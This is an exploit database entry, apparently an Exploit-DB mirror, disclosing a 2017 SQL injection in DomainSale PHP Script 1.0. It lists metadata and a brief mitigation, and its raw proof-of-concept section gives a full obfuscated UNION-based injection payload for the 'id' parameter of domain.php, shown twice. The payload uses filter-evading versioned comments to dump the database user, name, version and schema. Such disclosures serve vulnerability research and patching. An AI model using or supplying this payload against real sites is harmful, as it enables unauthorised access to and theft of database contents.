DomainSale PHP Script 1.0 - SQL Injection

vendor:

DomainSale PHP Script

by:

Ihsan Sencan

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: DomainSale PHP Script

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:codester:domainsale_php_script:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

DomainSale PHP Script 1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'id' of the domain.php script. An example of the exploit is provided in the proof of concept section.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.codester.com/ChewiScripts
# Software Link: https://www.codester.com/items/5301/domainsale-php-script
# Demo: http://chewiscripts.x10host.com/domain/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/domain.php?id=[SQL]
# 
# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
# 
# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
# 
# # # # #